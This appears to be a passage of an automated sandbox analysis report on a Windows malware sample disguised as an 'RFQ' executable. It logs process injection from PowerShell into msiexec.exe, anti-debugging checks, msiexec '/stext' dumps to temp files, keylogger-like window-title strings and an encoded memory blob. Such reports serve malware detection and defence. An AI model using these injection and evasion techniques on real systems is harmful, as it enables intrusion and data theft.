              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7216Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2482Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 9.2 %
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1484Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 1088Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5984Thread sleep count: 99 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5984Thread sleep time: -49500s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_00406555 FindFirstFileW,FindClose,0_2_00406555
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_0040287E FindFirstFileW,0_2_0040287E
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405A03
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_212010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_212010F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_21206580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,14_2_21206580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_00418981 memset,GetSystemInfo,17_2_00418981
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
              Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
              Source: svchost.exe, 0000000D.00000002.3394354847.000002B99EE55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3393112633.000002B99982B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3394879441.00000000056B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
              Source: msiexec.exe, 00000011.00000003.2921432545.0000000004951000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeAPI call chain: ExitProcess graph end nodegraph_0-3535
              Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_21202933 IsProcessorFeaturePresent,LdrInitializeThunk,LdrInitializeThunk,14_2_21202933
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_212060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_212060E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,17_2_004044A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_21204AB4 mov eax, dword ptr fs:[00000030h]14_2_21204AB4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2120724E GetProcessHeap,14_2_2120724E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_212060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_212060E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_21202B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_21202B1C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_21202639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_21202639

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3AE0000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\irnfnubnwufuubhrkbjztnmhqi"Jump to behavior
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerneer
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.3221293540.0000000005709000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3395028821.0000000005709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: msiexec.exe, 0000000E.00000003.3221293540.0000000005709000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3395028821.0000000005709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager7IL
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS
              Source: msiexec.exe, 0000000E.00000003.2928845396.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2928001965.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\*
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager)!
              Source: msiexec.exe, 0000000E.00000002.3394879441.000000000568A000.00000004.00000020.00020000.00000000.sdmp, logs.dat.14.drBinary or memory string: [Program Manager]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_21202933 cpuid 14_2_21202933
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
